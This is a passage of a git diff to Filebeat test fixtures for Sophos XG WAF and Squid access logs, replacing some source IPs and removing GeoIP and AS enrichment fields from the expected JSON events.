contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=216.160.83.61 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", "event.severity": "6", "event.timezone": "-02:00", "event.type": [ @@ -133,7 +112,7 @@ ], "related.ip": [ "185.8.209.207", - "89.68.140.204" + "216.160.83.61" ], "server.bytes": 1357, "server.ip": "185.8.209.207", @@ -143,7 +122,7 @@ "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", "sophos.xg.fw_rule_id": "79", - "sophos.xg.host": "89.68.140.204", + "sophos.xg.host": "216.160.83.61", "sophos.xg.log_component": "Web Application Firewall", "sophos.xg.log_type": "WAF", "sophos.xg.message_id": "17071", @@ -151,18 +130,17 @@ "sophos.xg.querystring": "?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com", "sophos.xg.responsetime": "14086", "sophos.xg.server": "webmail.elasticuser.com", - "source.as.number": 6830, - "source.as.organization.name": "Liberty Global B.V.", + "source.as.number": 209, "source.bytes": 1774, - "source.geo.city_name": "Gdynia", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "PL", - "source.geo.country_name": "Poland", - "source.geo.location.lat": 54.5055, - "source.geo.location.lon": 18.5403, - "source.geo.region_iso_code": "PL-22", - "source.geo.region_name": "Pomerania", - "source.ip": "89.68.140.204", + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.61", "tags": [ "forwarded", "sophos-xg" 
@@ -323,15 +301,8 @@ { "@timestamp": "2020-05-20T18:03:31.000-02:00", "client.bytes": 295, - "client.ip": "83.97.20.30", - "destination.as.number": 2914, - "destination.as.organization.name": "NTT America, Inc.", + "client.ip": "89.160.20.112", "destination.bytes": 403, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.167.51.72", "event.action": "denied", "event.category": [ 
@@ -342,7 +313,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", + "event.original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=89.160.20.112 localip=216.167.51.72 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=89.160.20.112 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", "event.outcome": "success", "event.severity": "6", "event.timezone": "-02:00", @@ -366,7 +337,7 @@ ], "related.ip": [ "216.167.51.72", - "83.97.20.30" + "89.160.20.112" ], "server.bytes": 5353, "server.ip": "216.167.51.72", 
@@ -376,7 +347,7 @@ "sophos.xg.device_name": "XG230", "sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7,", "sophos.xg.fw_rule_id": "3", - "sophos.xg.host": "83.97.20.30", + "sophos.xg.host": "89.160.20.112", "sophos.xg.log_component": "Web Application Firewall", "sophos.xg.log_type": "WAF", "sophos.xg.message_id": "17071", @@ -385,18 +356,18 @@ "sophos.xg.responsetime": "608", "sophos.xg.sqli": ",", "sophos.xg.xss": "): Last Matched Message: Request Missing a User Agent Header", - "source.as.number": 9009, - "source.as.organization.name": "M247 Ltd", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", "source.bytes": 295, - "source.geo.city_name": "Bucharest", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RO", - "source.geo.country_name": "Romania", - "source.geo.location.lat": 44.4176, - "source.geo.location.lon": 26.1708, - "source.geo.region_iso_code": "RO-B", - "source.geo.region_name": "Bucuresti", - "source.ip": "83.97.20.30", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded", "sophos-xg" diff --git a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json index 6614defcea29..d7620e206487 100644 --- a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json +++ b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json 
@@ -1,13 +1,6 @@ [ { "@timestamp": "2006-09-08T04:21:52.000Z", - "destination.as.number": 36752, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "209.73.177.115", "event.action": "TCP_MISS", "event.code": "CONNECT", @@ -65,16 +58,6 @@ }, { "@timestamp": "2006-09-08T04:22:00.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_MISS", "event.code": "GET", @@ -135,16 +118,6 @@ }, { "@timestamp": "2006-09-08T04:22:00.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", 
@@ -327,16 +300,6 @@ }, { "@timestamp": "2006-09-08T04:22:03.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_MISS", "event.code": "GET", @@ -397,13 +360,6 @@ }, { "@timestamp": "2006-09-08T04:22:04.000Z", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "66.102.9.147", "event.action": "TCP_MISS", "event.code": "GET", @@ -467,16 +423,6 @@ }, { "@timestamp": "2006-09-08T04:22:04.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", 
@@ -539,16 +485,6 @@ }, { "@timestamp": "2006-09-08T04:22:04.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -611,16 +547,6 @@ }, { "@timestamp": "2006-09-08T04:22:05.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -743,16 +669,6 @@ }, { "@timestamp": "2006-09-08T04:22:05.000Z", - "destination.as.number": 36351, - "destination.as.organization.name": "SoftLayer Technologies Inc.", - "destination.geo.city_name": "Dallas", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 32.9379, - "destination.geo.location.lon": -96.8384, - "destination.geo.region_iso_code": "US-TX", - "destination.geo.region_name": "Texas", "destination.ip": "209.85.16.38", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -815,11 +731,6 @@ }, { "@timestamp": "2006-09-08T04:22:06.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.213.132", "event.action": "TCP_MISS", "event.code": "CONNECT", @@ -877,13 +788,6 @@ }, { "@timestamp": "2006-09-08T04:22:07.000Z", - "destination.as.number": 1299, - "destination.as.organization.name": "Telia Company AB", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "SE", - "destination.geo.country_name": "Sweden", - "destination.geo.location.lat": 59.3247, - "destination.geo.location.lon": 18.056, "destination.ip": "217.212.240.172", "event.action": "TCP_MISS", "event.code": "GET", @@ -945,16 +849,6 @@ }, { "@timestamp": "2006-09-08T04:22:07.000Z", - "destination.as.number": 3549, - "destination.as.organization.name": "Level 3 Parent, LLC", - "destination.geo.city_name": "Los Angeles", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 34.0675, - "destination.geo.location.lon": -118.3521, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "206.169.136.22", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -1078,16 +972,6 @@ }, { "@timestamp": "2006-09-08T04:22:09.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -1150,16 +1034,6 @@ }, { "@timestamp": "2006-09-08T04:22:09.000Z", - "destination.as.number": 30633, - "destination.as.organization.name": "Leaseweb USA, Inc.", - "destination.geo.city_name": "Falls Church", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.9307, - "destination.geo.location.lon": -77.1673, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "207.58.145.61", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -1222,11 +1096,6 @@ }, { "@timestamp": "2006-09-08T04:22:10.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "64.127.126.178", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -1290,16 +1159,6 @@ }, { "@timestamp": "2006-09-08T04:22:11.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.161", "event.action": "TCP_MISS", "event.code": "GET", @@ -1362,16 +1221,6 @@ }, { "@timestamp": "2006-09-08T04:22:15.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.160", "event.action": "TCP_MISS", "event.code": "GET", @@ -1490,13 +1339,6 @@ }, { "@timestamp": "2006-09-08T04:22:22.000Z", - "destination.as.number": 36752, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "209.73.177.115", "event.action": "TCP_MISS", "event.code": "CONNECT", 
@@ -1614,13 +1456,6 @@ }, { "@timestamp": "2006-09-08T04:22:23.000Z", - "destination.as.number": 36646, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.155.194.239", "event.action": "TCP_MISS", "event.code": "POST", @@ -1680,16 +1515,6 @@ }, { "@timestamp": "2006-09-08T04:22:24.000Z", - "destination.as.number": 36077, - "destination.as.organization.name": "Dynamic ASP Inc.", - "destination.geo.city_name": "Victoria", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "CA", - "destination.geo.country_name": "Canada", - "destination.geo.location.lat": 48.4267, - "destination.geo.location.lon": -123.3655, - "destination.geo.region_iso_code": "CA-BC", - "destination.geo.region_name": "British Columbia", "destination.ip": "204.13.51.238", "event.action": "TCP_MISS", "event.code": "GET", @@ -1748,16 +1573,6 @@ }, { "@timestamp": "2006-09-08T04:22:24.000Z", - "destination.as.number": 36077, - "destination.as.organization.name": "Dynamic ASP Inc.", - "destination.geo.city_name": "Victoria", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "CA", - "destination.geo.country_name": "Canada", - "destination.geo.location.lat": 48.4267, - "destination.geo.location.lon": -123.3655, - "destination.geo.region_iso_code": "CA-BC", - "destination.geo.region_name": "British Columbia", "destination.ip": "204.13.51.238", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -1818,13 +1633,6 @@ }, { "@timestamp": "2006-09-08T04:22:25.000Z", - "destination.as.number": 36646, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.155.194.239", "event.action": "TCP_MISS", "event.code": "POST", @@ -2064,16 +1872,6 @@ }, { "@timestamp": "2006-09-08T04:22:27.000Z", - "destination.as.number": 36077, - "destination.as.organization.name": "Dynamic ASP Inc.", - "destination.geo.city_name": "Victoria", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "CA", - "destination.geo.country_name": "Canada", - "destination.geo.location.lat": 48.4267, - "destination.geo.location.lon": -123.3655, - "destination.geo.region_iso_code": "CA-BC", - "destination.geo.region_name": "British Columbia", "destination.ip": "204.13.51.238", "event.action": "TCP_MISS", "event.code": "GET", @@ -2132,16 +1930,6 @@ }, { "@timestamp": "2006-09-08T04:22:29.000Z", - "destination.as.number": 36077, - "destination.as.organization.name": "Dynamic ASP Inc.", - "destination.geo.city_name": "Victoria", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "CA", - "destination.geo.country_name": "Canada", - "destination.geo.location.lat": 48.4267, - "destination.geo.location.lon": -123.3655, - "destination.geo.region_iso_code": "CA-BC", - "destination.geo.region_name": "British Columbia", "destination.ip": "204.13.51.238", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -2202,13 +1990,6 @@ }, { "@timestamp": "2006-09-08T04:22:30.000Z", - "destination.as.number": 36646, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.155.194.239", "event.action": "TCP_MISS", "event.code": "POST", @@ -2268,11 +2049,6 @@ }, { "@timestamp": "2006-09-08T04:22:33.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.194.14", "event.action": "TCP_MISS", "event.code": "GET", @@ -2334,13 +2110,6 @@ }, { "@timestamp": "2006-09-08T04:22:33.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", @@ -2403,13 +2172,6 @@ }, { "@timestamp": "2006-09-08T04:22:34.000Z", - "destination.as.number": 36646, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.155.194.239", "event.action": "TCP_MISS", "event.code": "POST", 
@@ -2469,11 +2231,6 @@ }, { "@timestamp": "2006-09-08T04:22:35.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "209.191.93.51", "event.action": "TCP_MISS", "event.code": "GET", @@ -2536,16 +2293,6 @@ }, { "@timestamp": "2006-09-08T04:22:36.000Z", - "destination.as.number": 36856, - "destination.as.organization.name": "Mozilla Corporation", - "destination.geo.city_name": "Sacramento", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6415, - "destination.geo.location.lon": -121.5114, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "63.245.209.21", "event.action": "TCP_MISS", "event.code": "GET", @@ -2608,13 +2355,6 @@ }, { "@timestamp": "2006-09-08T04:22:37.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.231.252", "event.action": "TCP_MISS", "event.code": "GET", @@ -2676,11 +2416,6 @@ }, { "@timestamp": "2006-09-08T04:22:37.000Z", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.194.14", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -2970,13 +2705,6 @@ }, { "@timestamp": "2006-09-08T04:22:38.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -3094,13 +2822,6 @@ }, { "@timestamp": "2006-09-08T04:22:39.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -3163,13 +2884,6 @@ }, { "@timestamp": "2006-09-08T04:22:39.000Z", - "destination.as.number": 36646, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.155.194.239", "event.action": "TCP_MISS", "event.code": "POST", @@ -3229,13 +2943,6 @@ }, { "@timestamp": "2006-09-08T04:22:39.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", 
@@ -3298,13 +3005,6 @@ }, { "@timestamp": "2006-09-08T04:22:40.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -3485,13 +3185,6 @@ }, { "@timestamp": "2006-09-08T04:22:41.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -3554,13 +3247,6 @@ }, { "@timestamp": "2006-09-08T04:22:41.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -3623,13 +3309,6 @@ }, { "@timestamp": "2006-09-08T04:22:42.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", 
@@ -3692,13 +3371,6 @@ }, { "@timestamp": "2006-09-08T04:22:42.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_REFRESH_HIT", "event.code": "GET", @@ -3941,13 +3613,6 @@ }, { "@timestamp": "2006-09-08T04:22:43.000Z", - "destination.as.number": 2818, - "destination.as.organization.name": "BBC", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.4964, - "destination.geo.location.lon": -0.1224, "destination.ip": "212.58.226.33", "event.action": "TCP_REFRESH_MISS", "event.code": "GET", @@ -4010,13 +3675,6 @@ }, { "@timestamp": "2006-09-08T04:22:44.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.231.252", "event.action": "TCP_MISS", "event.code": "GET", @@ -4199,13 +3857,6 @@ }, { "@timestamp": "2006-09-08T04:22:45.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "POST", 
@@ -4267,16 +3918,6 @@ }, { "@timestamp": "2006-09-08T04:22:46.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.159", "event.action": "TCP_MISS", "event.code": "GET", @@ -4339,13 +3980,6 @@ }, { "@timestamp": "2006-09-08T04:22:48.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", @@ -4409,13 +4043,6 @@ }, { "@timestamp": "2006-09-08T04:22:48.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -4479,13 +4106,6 @@ }, { "@timestamp": "2006-09-08T04:22:48.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", @@ -4671,16 +4291,6 @@ }, { "@timestamp": "2006-09-08T04:22:50.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.159", "event.action": "TCP_MISS", "event.code": "GET", @@ -4743,13 +4353,6 @@ }, { "@timestamp": "2006-09-08T04:22:50.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", 
@@ -4813,13 +4416,6 @@ }, { "@timestamp": "2006-09-08T04:22:51.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "68.142.219.132", "event.action": "TCP_MISS", "event.code": "GET", @@ -4883,16 +4479,6 @@ }, { "@timestamp": "2006-09-08T04:22:51.000Z", - "destination.as.number": 8190, - "destination.as.organization.name": "MDNX Internet Limited", - "destination.geo.city_name": "London", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5064, - "destination.geo.location.lon": -0.02, - "destination.geo.region_iso_code": "GB-ENG", - "destination.geo.region_name": "England", "destination.ip": "213.160.98.152", "event.action": "TCP_MISS", "event.code": "GET", @@ -4956,13 +4542,6 @@ }, { "@timestamp": "2006-09-08T04:22:53.000Z", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - 